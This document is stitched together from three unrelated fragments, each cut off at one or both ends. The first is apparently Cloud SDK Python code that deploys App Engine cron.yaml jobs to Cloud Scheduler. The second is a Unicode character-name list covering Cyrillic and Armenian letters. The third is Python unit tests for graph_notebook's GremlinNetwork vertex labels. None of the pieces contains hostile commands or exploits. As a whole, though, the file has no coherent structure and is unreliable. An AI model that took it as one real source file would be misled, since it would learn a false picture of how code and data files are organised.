job.retryConfig.minBackoffDuration) if job.retryConfig else None,
convertors.CheckAndConvertStringToFloatIfApplicable(
job.retryConfig.maxBackoffDuration) if job.retryConfig else None,
job.retryConfig.maxDoublings if job.retryConfig else None,
convertors.CheckAndConvertStringToFloatIfApplicable(
job.retryConfig.maxRetryDuration) if job.retryConfig else None,
job.retryConfig.retryCount if job.retryConfig else None,
parsers.ExtractTargetFromAppEngineHostUrl(job, project),
)
def _ReplaceDefaultRetryParamsForYamlJob(job):
"""Replaces default values for retry parameters.
Retry parameters are set to their default values if not already user defined.
These values are only set if the user has defined at least one retry
parameter. Also we are limiting min_backoff to a minimum value of 5.0s since
the new scheduler API does not support setting a lower value than this.
Modifies input `job` argument directly.
Args:
job: An instance of a parsed YAML job object.
"""
defaults = constants.CRON_JOB_LEGACY_DEFAULT_VALUES
retry_data = job.retry_parameters
if retry_data:
# Min max backoff is a special case. If only one is specified, the other
# value is set to its default value as long as this condition is satisfied:
# 'min_backoff <= max_backoff'. Otherwise, the unspecified value is set
# equal to the specified value.
if (
retry_data.min_backoff_seconds is None and
retry_data.max_backoff_seconds is None
):
# Both values are None so we should set them to defaults.
retry_data.min_backoff_seconds = defaults['min_backoff']
retry_data.max_backoff_seconds = defaults['max_backoff']
elif (
retry_data.min_backoff_seconds is None or
retry_data.max_backoff_seconds is None
):
# Only one of the backoff values is None. We need to ensure that
# min_backoff <= max_backoff.
if not retry_data.min_backoff_seconds:
retry_data.min_backoff_seconds = defaults['min_backoff']
if retry_data.max_backoff_seconds:
retry_data.min_backoff_seconds = min(retry_data.min_backoff_seconds,
retry_data.max_backoff_seconds)
if retry_data.max_backoff_seconds is None:
retry_data.max_backoff_seconds = defaults['max_backoff']
retry_data.max_backoff_seconds = max(retry_data.min_backoff_seconds,
retry_data.max_backoff_seconds)
# Max Doublings
if retry_data.max_doublings is None:
retry_data.max_doublings = defaults['max_doublings']
# Job Age Limit
if retry_data.job_age_limit is None:
retry_data.job_age_limit = defaults['max_retry_duration']
def _CreateUniqueJobKeyForYamlJob(job):
"""Creates a key from the YAML job instance's attributes passed as input.
Args:
job: An instance of a parsed YAML job object.
Returns:
A tuple of attributes used as a key to identify this job.
"""
retry_params = job.retry_parameters
return (
job.schedule,
job.timezone if job.timezone else 'UTC',
job.url,
job.description,
retry_params.min_backoff_seconds if retry_params else None,
retry_params.max_backoff_seconds if retry_params else None,
retry_params.max_doublings if retry_params else None,
convertors.CheckAndConvertStringToFloatIfApplicable(
retry_params.job_age_limit) if retry_params else None,
retry_params.job_retry_limit if retry_params else None,
job.target,
)
def _BuildJobsMappingDict(existing_jobs, project):
"""Builds a dictionary of unique jobs by attributes.
Each key is in this dictionary is based on all the existing attributes of a
job. Multiple jobs can map to the same key if all their attributes (schedule,
url, timezone, description, etc.) match.
Args:
existing_jobs: A list of jobs that already exist in the backend. Each job
maps to an apis.cloudscheduler.<ver>.cloudscheduler<ver>_messages.Job
instance.
project: The base name of the project.
Returns:
A dictionary where a key is built based on a all the job attributes and the
value is an apis.cloudscheduler.<ver>.cloudscheduler<ver>_messages.Job
instance.
"""
jobs_indexed_dict = {}
for job in existing_jobs:
key = _CreateUniqueJobKeyForExistingJob(job, project)
if key not in jobs_indexed_dict:
jobs_indexed_dict[key] = []
jobs_indexed_dict[key].append(job)
return jobs_indexed_dict
def CreateJobInstance(scheduler_api, yaml_job):
"""Build a proto format job instance matching the input YAML based job.
Args:
scheduler_api: api_lib.scheduler.<Alpha|Beta|GA>ApiAdapter, Cloud Scheduler
API needed for doing jobs based operations.
yaml_job: A parsed yaml_job entry read from the 'cron.yaml' file.
Returns:
An cloudscheduler.<ver>.cloudscheduler_<ver>_messages.Job instance.
"""
messages = scheduler_api.messages
if yaml_job.retry_parameters:
retry_config = messages.RetryConfig(
maxBackoffDuration=convertors.ConvertBackoffSeconds(
yaml_job.retry_parameters.max_backoff_seconds),
maxDoublings=yaml_job.retry_parameters.max_doublings,
maxRetryDuration=convertors.ConvertTaskAgeLimit(
yaml_job.retry_parameters.job_age_limit),
minBackoffDuration=convertors.ConvertBackoffSeconds(
yaml_job.retry_parameters.min_backoff_seconds),
retryCount=yaml_job.retry_parameters.job_retry_limit
)
else:
retry_config = None
return messages.Job(
appEngineHttpTarget=messages.AppEngineHttpTarget(
httpMethod=messages.AppEngineHttpTarget.HttpMethodValueValuesEnum.GET,
relativeUri=yaml_job.url,
appEngineRouting=messages.AppEngineRouting(service=yaml_job.target)),
retryConfig=retry_config,
description=yaml_job.description,
legacyAppEngineCron=scheduler_api.jobs.legacy_cron,
schedule=yaml_job.schedule,
timeZone=yaml_job.timezone if yaml_job.timezone else 'UTC')
def DeployCronYamlFile(scheduler_api, config, existing_jobs):
"""Perform a deployment based on the parsed 'cron.yaml' file.
For every job defined in the cron.yaml file, we will create a new cron job
for any job that did not already exist in our backend. We will also delete
those jobs which are not present in the YAML file but exist in our backend.
Note: We do not update any jobs. The only operations are Create and Delete.
So if we modify any attribute of an existing job in the YAML file, the old
job gets deleted and a new job is created based on the new attributes.
Args:
scheduler_api: api_lib.scheduler.<Alpha|Beta|GA>ApiAdapter, Cloud Scheduler
API needed for doing jobs based operations.
config: A yaml_parsing.ConfigYamlInfo object for the parsed YAML file we
are going to process.
existing_jobs: A list of jobs that already exist in the backend. Each job
maps to an apis.cloudscheduler.<ver>.cloudscheduler<ver>_messages.Job
instance.
Returns:
A list of responses received from the Cloud Scheduler APIs representing job
states for every call made to create a job.
"""
cron_yaml = config.parsed
jobs_client = scheduler_api.jobs
app_location = app.ResolveAppLocation(
parsers.ParseProject(), locations_client=scheduler_api.locations)
region_ref = parsers.ParseLocation(app_location).RelativeName()
project = os.path.basename(str(parsers.ParseProject()))
existing_jobs_dict = _BuildJobsMappingDict(existing_jobs, project)
# Create a new job for any job that does not map exactly to jobs that already
# exist in the backend.
responses = []
if cron_yaml.cron:
for yaml_job in cron_yaml.cron:
_ReplaceDefaultRetryParamsForYamlJob(yaml_job)
job_key = _CreateUniqueJobKeyForYamlJob(yaml_job)
if job_key in existing_jobs_dict and existing_jobs_dict[job_key]:
# If the job already exists then we do not need to do | |
LETTER EF
0425 CYRILLIC CAPITAL LETTER HA
0426 CYRILLIC CAPITAL LETTER TSE
0427 CYRILLIC CAPITAL LETTER CHE
0428 CYRILLIC CAPITAL LETTER SHA
0429 CYRILLIC CAPITAL LETTER SHCHA
042A CYRILLIC CAPITAL LETTER HARD SIGN
042B CYRILLIC CAPITAL LETTER YERU
042C CYRILLIC CAPITAL LETTER SOFT SIGN
042D CYRILLIC CAPITAL LETTER E
042E CYRILLIC CAPITAL LETTER YU
042F CYRILLIC CAPITAL LETTER YA
0430 CYRILLIC SMALL LETTER A
0431 CYRILLIC SMALL LETTER BE
0432 CYRILLIC SMALL LETTER VE
0433 CYRILLIC SMALL LETTER GHE
0434 CYRILLIC SMALL LETTER DE
0435 CYRILLIC SMALL LETTER IE
0436 CYRILLIC SMALL LETTER ZHE
0437 CYRILLIC SMALL LETTER ZE
0438 CYRILLIC SMALL LETTER I
0439 CYRILLIC SMALL LETTER SHORT I
043A CYRILLIC SMALL LETTER KA
043B CYRILLIC SMALL LETTER EL
043C CYRILLIC SMALL LETTER EM
043D CYRILLIC SMALL LETTER EN
043E CYRILLIC SMALL LETTER O
043F CYRILLIC SMALL LETTER PE
0440 CYRILLIC SMALL LETTER ER
0441 CYRILLIC SMALL LETTER ES
0442 CYRILLIC SMALL LETTER TE
0443 CYRILLIC SMALL LETTER U
0444 CYRILLIC SMALL LETTER EF
0445 CYRILLIC SMALL LETTER HA
0446 CYRILLIC SMALL LETTER TSE
0447 CYRILLIC SMALL LETTER CHE
0448 CYRILLIC SMALL LETTER SHA
0449 CYRILLIC SMALL LETTER SHCHA
044A CYRILLIC SMALL LETTER HARD SIGN
044B CYRILLIC SMALL LETTER YERU
044C CYRILLIC SMALL LETTER SOFT SIGN
044D CYRILLIC SMALL LETTER E
044E CYRILLIC SMALL LETTER YU
044F CYRILLIC SMALL LETTER YA
0450 CYRILLIC SMALL LETTER IE WITH GRAVE
0451 CYRILLIC SMALL LETTER IO
0452 CYRILLIC SMALL LETTER DJE
0453 CYRILLIC SMALL LETTER GJE
0454 CYRILLIC SMALL LETTER UKRAINIAN IE
0455 CYRILLIC SMALL LETTER DZE
0456 CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
0457 CYRILLIC SMALL LETTER YI
0458 CYRILLIC SMALL LETTER JE
0459 CYRILLIC SMALL LETTER LJE
045A CYRILLIC SMALL LETTER NJE
045B CYRILLIC SMALL LETTER TSHE
045C CYRILLIC SMALL LETTER KJE
045D CYRILLIC SMALL LETTER I WITH GRAVE
045E CYRILLIC SMALL LETTER SHORT U
045F CYRILLIC SMALL LETTER DZHE
0460 CYRILLIC CAPITAL LETTER OMEGA
0461 CYRILLIC SMALL LETTER OMEGA
0462 CYRILLIC CAPITAL LETTER YAT
0463 CYRILLIC SMALL LETTER YAT
0464 CYRILLIC CAPITAL LETTER IOTIFIED E
0465 CYRILLIC SMALL LETTER IOTIFIED E
0466 CYRILLIC CAPITAL LETTER LITTLE YUS
0467 CYRILLIC SMALL LETTER LITTLE YUS
0468 CYRILLIC CAPITAL LETTER IOTIFIED LITTLE YUS
0469 CYRILLIC SMALL LETTER IOTIFIED LITTLE YUS
046A CYRILLIC CAPITAL LETTER BIG YUS
046B CYRILLIC SMALL LETTER BIG YUS
046C CYRILLIC CAPITAL LETTER IOTIFIED BIG YUS
046D CYRILLIC SMALL LETTER IOTIFIED BIG YUS
046E CYRILLIC CAPITAL LETTER KSI
046F CYRILLIC SMALL LETTER KSI
0470 CYRILLIC CAPITAL LETTER PSI
0471 CYRILLIC SMALL LETTER PSI
0472 CYRILLIC CAPITAL LETTER FITA
0473 CYRILLIC SMALL LETTER FITA
0474 CYRILLIC CAPITAL LETTER IZHITSA
0475 CYRILLIC SMALL LETTER IZHITSA
0476 CYRILLIC CAPITAL LETTER IZHITSA WITH DOUBLE GRAVE ACCENT
0477 CYRILLIC SMALL LETTER IZHITSA WITH DOUBLE GRAVE ACCENT
0478 CYRILLIC CAPITAL LETTER UK
0479 CYRILLIC SMALL LETTER UK
047A CYRILLIC CAPITAL LETTER ROUND OMEGA
047B CYRILLIC SMALL LETTER ROUND OMEGA
047C CYRILLIC CAPITAL LETTER OMEGA WITH TITLO
047D CYRILLIC SMALL LETTER OMEGA WITH TITLO
047E CYRILLIC CAPITAL LETTER OT
047F CYRILLIC SMALL LETTER OT
0480 CYRILLIC CAPITAL LETTER KOPPA
0481 CYRILLIC SMALL LETTER KOPPA
0482 CYRILLIC THOUSANDS SIGN
0483 COMBINING CYRILLIC TITLO
0484 COMBINING CYRILLIC PALATALIZATION
0485 COMBINING CYRILLIC DASIA PNEUMATA
0486 COMBINING CYRILLIC PSILI PNEUMATA
0487 COMBINING CYRILLIC POKRYTIE
0488 COMBINING CYRILLIC HUNDRED THOUSANDS SIGN
0489 COMBINING CYRILLIC MILLIONS SIGN
048A CYRILLIC CAPITAL LETTER SHORT I WITH TAIL
048B CYRILLIC SMALL LETTER SHORT I WITH TAIL
048C CYRILLIC CAPITAL LETTER SEMISOFT SIGN
048D CYRILLIC SMALL LETTER SEMISOFT SIGN
048E CYRILLIC CAPITAL LETTER ER WITH TICK
048F CYRILLIC SMALL LETTER ER WITH TICK
0490 CYRILLIC CAPITAL LETTER GHE WITH UPTURN
0491 CYRILLIC SMALL LETTER GHE WITH UPTURN
0492 CYRILLIC CAPITAL LETTER GHE WITH STROKE
0493 CYRILLIC SMALL LETTER GHE WITH STROKE
0494 CYRILLIC CAPITAL LETTER GHE WITH MIDDLE HOOK
0495 CYRILLIC SMALL LETTER GHE WITH MIDDLE HOOK
0496 CYRILLIC CAPITAL LETTER ZHE WITH DESCENDER
0497 CYRILLIC SMALL LETTER ZHE WITH DESCENDER
0498 CYRILLIC CAPITAL LETTER ZE WITH DESCENDER
0499 CYRILLIC SMALL LETTER ZE WITH DESCENDER
049A CYRILLIC CAPITAL LETTER KA WITH DESCENDER
049B CYRILLIC SMALL LETTER KA WITH DESCENDER
049C CYRILLIC CAPITAL LETTER KA WITH VERTICAL STROKE
049D CYRILLIC SMALL LETTER KA WITH VERTICAL STROKE
049E CYRILLIC CAPITAL LETTER KA WITH STROKE
049F CYRILLIC SMALL LETTER KA WITH STROKE
04A0 CYRILLIC CAPITAL LETTER BASHKIR KA
04A1 CYRILLIC SMALL LETTER BASHKIR KA
04A2 CYRILLIC CAPITAL LETTER EN WITH DESCENDER
04A3 CYRILLIC SMALL LETTER EN WITH DESCENDER
04A4 CYRILLIC CAPITAL LIGATURE EN GHE
04A5 CYRILLIC SMALL LIGATURE EN GHE
04A6 CYRILLIC CAPITAL LETTER PE WITH MIDDLE HOOK
04A7 CYRILLIC SMALL LETTER PE WITH MIDDLE HOOK
04A8 CYRILLIC CAPITAL LETTER ABKHASIAN HA
04A9 CYRILLIC SMALL LETTER ABKHASIAN HA
04AA CYRILLIC CAPITAL LETTER ES WITH DESCENDER
04AB CYRILLIC SMALL LETTER ES WITH DESCENDER
04AC CYRILLIC CAPITAL LETTER TE WITH DESCENDER
04AD CYRILLIC SMALL LETTER TE WITH DESCENDER
04AE CYRILLIC CAPITAL LETTER STRAIGHT U
04AF CYRILLIC SMALL LETTER STRAIGHT U
04B0 CYRILLIC CAPITAL LETTER STRAIGHT U WITH STROKE
04B1 CYRILLIC SMALL LETTER STRAIGHT U WITH STROKE
04B2 CYRILLIC CAPITAL LETTER HA WITH DESCENDER
04B3 CYRILLIC SMALL LETTER HA WITH DESCENDER
04B4 CYRILLIC CAPITAL LIGATURE TE TSE
04B5 CYRILLIC SMALL LIGATURE TE TSE
04B6 CYRILLIC CAPITAL LETTER CHE WITH DESCENDER
04B7 CYRILLIC SMALL LETTER CHE WITH DESCENDER
04B8 CYRILLIC CAPITAL LETTER CHE WITH VERTICAL STROKE
04B9 CYRILLIC SMALL LETTER CHE WITH VERTICAL STROKE
04BA CYRILLIC CAPITAL LETTER SHHA
04BB CYRILLIC SMALL LETTER SHHA
04BC CYRILLIC CAPITAL LETTER ABKHASIAN CHE
04BD CYRILLIC SMALL LETTER ABKHASIAN CHE
04BE CYRILLIC CAPITAL LETTER ABKHASIAN CHE WITH DESCENDER
04BF CYRILLIC SMALL LETTER ABKHASIAN CHE WITH DESCENDER
04C0 CYRILLIC LETTER PALOCHKA
04C1 CYRILLIC CAPITAL LETTER ZHE WITH BREVE
04C2 CYRILLIC SMALL LETTER ZHE WITH BREVE
04C3 CYRILLIC CAPITAL LETTER KA WITH HOOK
04C4 CYRILLIC SMALL LETTER KA WITH HOOK
04C5 CYRILLIC CAPITAL LETTER EL WITH TAIL
04C6 CYRILLIC SMALL LETTER EL WITH TAIL
04C7 CYRILLIC CAPITAL LETTER EN WITH HOOK
04C8 CYRILLIC SMALL LETTER EN WITH HOOK
04C9 CYRILLIC CAPITAL LETTER EN WITH TAIL
04CA CYRILLIC SMALL LETTER EN WITH TAIL
04CB CYRILLIC CAPITAL LETTER KHAKASSIAN CHE
04CC CYRILLIC SMALL LETTER KHAKASSIAN CHE
04CD CYRILLIC CAPITAL LETTER EM WITH TAIL
04CE CYRILLIC SMALL LETTER EM WITH TAIL
04CF CYRILLIC SMALL LETTER PALOCHKA
04D0 CYRILLIC CAPITAL LETTER A WITH BREVE
04D1 CYRILLIC SMALL LETTER A WITH BREVE
04D2 CYRILLIC CAPITAL LETTER A WITH DIAERESIS
04D3 CYRILLIC SMALL LETTER A WITH DIAERESIS
04D4 CYRILLIC CAPITAL LIGATURE A IE
04D5 CYRILLIC SMALL LIGATURE A IE
04D6 CYRILLIC CAPITAL LETTER IE WITH BREVE
04D7 CYRILLIC SMALL LETTER IE WITH BREVE
04D8 CYRILLIC CAPITAL LETTER SCHWA
04D9 CYRILLIC SMALL LETTER SCHWA
04DA CYRILLIC CAPITAL LETTER SCHWA WITH DIAERESIS
04DB CYRILLIC SMALL LETTER SCHWA WITH DIAERESIS
04DC CYRILLIC CAPITAL LETTER ZHE WITH DIAERESIS
04DD CYRILLIC SMALL LETTER ZHE WITH DIAERESIS
04DE CYRILLIC CAPITAL LETTER ZE WITH DIAERESIS
04DF CYRILLIC SMALL LETTER ZE WITH DIAERESIS
04E0 CYRILLIC CAPITAL LETTER ABKHASIAN DZE
04E1 CYRILLIC SMALL LETTER ABKHASIAN DZE
04E2 CYRILLIC CAPITAL LETTER I WITH MACRON
04E3 CYRILLIC SMALL LETTER I WITH MACRON
04E4 CYRILLIC CAPITAL LETTER I WITH DIAERESIS
04E5 CYRILLIC SMALL LETTER I WITH DIAERESIS
04E6 CYRILLIC CAPITAL LETTER O WITH DIAERESIS
04E7 CYRILLIC SMALL LETTER O WITH DIAERESIS
04E8 CYRILLIC CAPITAL LETTER BARRED O
04E9 CYRILLIC SMALL LETTER BARRED O
04EA CYRILLIC CAPITAL LETTER BARRED O WITH DIAERESIS
04EB CYRILLIC SMALL LETTER BARRED O WITH DIAERESIS
04EC CYRILLIC CAPITAL LETTER E WITH DIAERESIS
04ED CYRILLIC SMALL LETTER E WITH DIAERESIS
04EE CYRILLIC CAPITAL LETTER U WITH MACRON
04EF CYRILLIC SMALL LETTER U WITH MACRON
04F0 CYRILLIC CAPITAL LETTER U WITH DIAERESIS
04F1 CYRILLIC SMALL LETTER U WITH DIAERESIS
04F2 CYRILLIC CAPITAL LETTER U WITH DOUBLE ACUTE
04F3 CYRILLIC SMALL LETTER U WITH DOUBLE ACUTE
04F4 CYRILLIC CAPITAL LETTER CHE WITH DIAERESIS
04F5 CYRILLIC SMALL LETTER CHE WITH DIAERESIS
04F6 CYRILLIC CAPITAL LETTER GHE WITH DESCENDER
04F7 CYRILLIC SMALL LETTER GHE WITH DESCENDER
04F8 CYRILLIC CAPITAL LETTER YERU WITH DIAERESIS
04F9 CYRILLIC SMALL LETTER YERU WITH DIAERESIS
04FA CYRILLIC CAPITAL LETTER GHE WITH STROKE AND HOOK
04FB CYRILLIC SMALL LETTER GHE WITH STROKE AND HOOK
04FC CYRILLIC CAPITAL LETTER HA WITH HOOK
04FD CYRILLIC SMALL LETTER HA WITH HOOK
04FE CYRILLIC CAPITAL LETTER HA WITH STROKE
04FF CYRILLIC SMALL LETTER HA WITH STROKE
0500 CYRILLIC CAPITAL LETTER KOMI DE
0501 CYRILLIC SMALL LETTER KOMI DE
0502 CYRILLIC CAPITAL LETTER KOMI DJE
0503 CYRILLIC SMALL LETTER KOMI DJE
0504 CYRILLIC CAPITAL LETTER KOMI ZJE
0505 CYRILLIC SMALL LETTER KOMI ZJE
0506 CYRILLIC CAPITAL LETTER KOMI DZJE
0507 CYRILLIC SMALL LETTER KOMI DZJE
0508 CYRILLIC CAPITAL LETTER KOMI LJE
0509 CYRILLIC SMALL LETTER KOMI LJE
050A CYRILLIC CAPITAL LETTER KOMI NJE
050B CYRILLIC SMALL LETTER KOMI NJE
050C CYRILLIC CAPITAL LETTER KOMI SJE
050D CYRILLIC SMALL LETTER KOMI SJE
050E CYRILLIC CAPITAL LETTER KOMI TJE
050F CYRILLIC SMALL LETTER KOMI TJE
0510 CYRILLIC CAPITAL LETTER REVERSED ZE
0511 CYRILLIC SMALL LETTER REVERSED ZE
0512 CYRILLIC CAPITAL LETTER EL WITH HOOK
0513 CYRILLIC SMALL LETTER EL WITH HOOK
0514 CYRILLIC CAPITAL LETTER LHA
0515 CYRILLIC SMALL LETTER LHA
0516 CYRILLIC CAPITAL LETTER RHA
0517 CYRILLIC SMALL LETTER RHA
0518 CYRILLIC CAPITAL LETTER YAE
0519 CYRILLIC SMALL LETTER YAE
051A CYRILLIC CAPITAL LETTER QA
051B CYRILLIC SMALL LETTER QA
051C CYRILLIC CAPITAL LETTER WE
051D CYRILLIC SMALL LETTER WE
051E CYRILLIC CAPITAL LETTER ALEUT KA
051F CYRILLIC SMALL LETTER ALEUT KA
0520 CYRILLIC CAPITAL LETTER EL WITH MIDDLE HOOK
0521 CYRILLIC SMALL LETTER EL WITH MIDDLE HOOK
0522 CYRILLIC CAPITAL LETTER EN WITH MIDDLE HOOK
0523 CYRILLIC SMALL LETTER EN WITH MIDDLE HOOK
0524 CYRILLIC CAPITAL LETTER PE WITH DESCENDER
0525 CYRILLIC SMALL LETTER PE WITH DESCENDER
0531 ARMENIAN CAPITAL LETTER AYB
0532 ARMENIAN CAPITAL LETTER BEN
0533 ARMENIAN CAPITAL LETTER GIM
0534 ARMENIAN CAPITAL LETTER DA
0535 ARMENIAN CAPITAL LETTER ECH
0536 ARMENIAN CAPITAL LETTER ZA
0537 ARMENIAN CAPITAL LETTER EH
0538 ARMENIAN CAPITAL LETTER ET
0539 ARMENIAN CAPITAL LETTER TO
053A ARMENIAN CAPITAL LETTER ZHE
053B ARMENIAN CAPITAL LETTER INI
053C ARMENIAN CAPITAL LETTER LIWN
053D ARMENIAN CAPITAL LETTER XEH
053E ARMENIAN CAPITAL LETTER CA
053F ARMENIAN CAPITAL LETTER KEN
0540 ARMENIAN CAPITAL LETTER HO
0541 ARMENIAN CAPITAL LETTER JA
0542 ARMENIAN CAPITAL LETTER GHAD
0543 ARMENIAN CAPITAL LETTER CHEH
0544 ARMENIAN CAPITAL LETTER MEN
0545 ARMENIAN CAPITAL LETTER YI
0546 ARMENIAN CAPITAL LETTER NOW
0547 ARMENIAN CAPITAL LETTER SHA
0548 ARMENIAN CAPITAL LETTER VO
0549 ARMENIAN CAPITAL LETTER CHA
054A ARMENIAN CAPITAL LETTER PEH
054B ARMENIAN CAPITAL LETTER JHEH
054C ARMENIAN CAPITAL LETTER RA
054D ARMENIAN CAPITAL LETTER SEH
054E ARMENIAN CAPITAL LETTER VEW
054F ARMENIAN CAPITAL LETTER TIWN
0550 ARMENIAN CAPITAL LETTER REH
0551 ARMENIAN CAPITAL LETTER CO
0552 ARMENIAN CAPITAL LETTER YIWN
0553 ARMENIAN CAPITAL LETTER PIWR
0554 ARMENIAN CAPITAL LETTER KEH
0555 ARMENIAN CAPITAL LETTER OH
0556 ARMENIAN CAPITAL LETTER FEH
0559 ARMENIAN MODIFIER LETTER LEFT HALF RING
055A ARMENIAN APOSTROPHE
055B ARMENIAN EMPHASIS MARK
055C ARMENIAN EXCLAMATION MARK
055D ARMENIAN COMMA
055E ARMENIAN QUESTION MARK
055F ARMENIAN ABBREVIATION MARK
0561 ARMENIAN SMALL LETTER AYB
0562 ARMENIAN SMALL LETTER BEN
0563 ARMENIAN SMALL LETTER GIM
0564 ARMENIAN SMALL LETTER DA
0565 ARMENIAN SMALL LETTER ECH
0566 ARMENIAN SMALL LETTER ZA
0567 ARMENIAN SMALL LETTER EH
0568 ARMENIAN SMALL LETTER ET
0569 ARMENIAN SMALL LETTER TO
056A ARMENIAN SMALL LETTER ZHE
056B ARMENIAN SMALL LETTER INI
056C ARMENIAN SMALL LETTER LIWN
056D ARMENIAN SMALL LETTER XEH
056E ARMENIAN SMALL LETTER CA
056F ARMENIAN SMALL LETTER KEN
0570 ARMENIAN SMALL LETTER HO
0571 ARMENIAN SMALL LETTER JA
0572 ARMENIAN SMALL LETTER GHAD
0573 ARMENIAN SMALL LETTER CHEH
0574 ARMENIAN SMALL LETTER MEN
0575 ARMENIAN SMALL LETTER YI
0576 ARMENIAN SMALL LETTER NOW
0577 ARMENIAN SMALL LETTER SHA
0578 ARMENIAN SMALL LETTER VO
0579 ARMENIAN SMALL LETTER CHA
057A ARMENIAN SMALL LETTER PEH
057B ARMENIAN | |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import unittest
from gremlin_python.structure.graph import Path, Edge, Vertex
from gremlin_python.process.traversal import T
from graph_notebook.network.EventfulNetwork import EVENT_ADD_NODE
from graph_notebook.network.gremlin.GremlinNetwork import GremlinNetwork
class TestGremlinNetwork(unittest.TestCase):
def test_add_vertex_with_callback(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
reached_callback = {}
expected_data = {
'data': {
'group': 'airport',
'label': 'airport',
'properties': {
T.id: '1234',
T.label: 'airport',
'code': 'SEA',
'runways': '4',
'type': 'Airport'},
'title': 'airport'},
'node_id': '1234'}
def add_node_callback(network, event_name, data):
self.assertEqual(event_name, EVENT_ADD_NODE)
self.assertEqual(expected_data, data)
reached_callback[event_name] = True
gn = GremlinNetwork(callbacks={EVENT_ADD_NODE: [add_node_callback]})
gn.add_vertex(vertex)
self.assertTrue(reached_callback[EVENT_ADD_NODE])
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(expected_data['data']['properties'], node['properties'])
def test_add_explicit_type_vertex_without_node_property(self):
vertex = Vertex(id='1')
gn = GremlinNetwork()
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], 'vertex')
def test_add_explicit_type_vertex_with_invalid_node_property_label(self):
vertex = Vertex(id='1')
gn = GremlinNetwork(display_property='foo')
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_label(self):
vertex = Vertex(id='1')
gn = GremlinNetwork(display_property='label')
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_id(self):
vertex = Vertex(id='1')
gn = GremlinNetwork(display_property='id')
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], '1')
def test_add_explicit_type_vertex_with_node_property_json(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"vertex":"id"}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], '1')
def test_add_explicit_type_vertex_with_node_property_json_invalid_json(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"vertex":id}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_json_invalid_key(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"foo":"id"}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_json_invalid_value(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"vertex":"code"}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], 'vertex')
def test_add_explicit_type_multiple_vertex_with_node_property_string(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
gn = GremlinNetwork(display_property='id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get('1')
node2 = gn.graph.nodes.get('2')
self.assertEqual(node1['label'], '1')
self.assertEqual(node2['label'], '2')
def test_add_explicit_type_multiple_vertex_with_node_property_json(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
gn = GremlinNetwork(display_property='{"vertex":"id"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get('1')
node2 = gn.graph.nodes.get('2')
self.assertEqual(node1['label'], '1')
self.assertEqual(node2['label'], '2')
def test_add_vertex_without_node_property(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork()
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_string(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='code')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'SEA')
def test_add_vertex_with_node_property_string_invalid(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='desc')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_json(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"airport":"code"}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'SEA')
def test_add_vertex_with_node_property_json_invalid_json(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"airport":code}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_json_invalid_key(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"country":"code"}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_json_invalid_value(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"airport":"desc"}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_multiple_with_node_property_string(self):
vertex1 = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
vertex2 = {
T.id: '2345',
T.label: 'country',
'type': 'Country',
'continent': 'NA',
'code': 'USA'
}
